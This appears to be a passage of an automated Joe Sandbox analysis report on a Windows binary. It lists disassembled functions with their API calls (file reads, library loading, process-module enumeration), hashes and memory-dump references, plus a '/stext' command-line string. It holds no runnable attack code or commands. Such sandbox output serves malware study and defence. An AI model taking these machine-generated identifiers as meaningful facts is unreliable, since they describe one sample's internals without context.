                                                                                                                                                                                                                                    • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                    • String ID: BINARY
                                                                                                                                                                                                                                    • API String ID: 2221118986-907554435
                                                                                                                                                                                                                                    • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                                    • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2445788494-0
                                                                                                                                                                                                                                    • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                    • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcmpmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1065087418-0
                                                                                                                                                                                                                                    • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$??2@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3700833809-0
                                                                                                                                                                                                                                    • Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                                                                                    • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1381354015-0
                                                                                                                                                                                                                                    • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                    • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                                                                                                    • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                    • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2154303073-0
                                                                                                                                                                                                                                    • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                                                                    • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3859505661-0
                                                                                                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
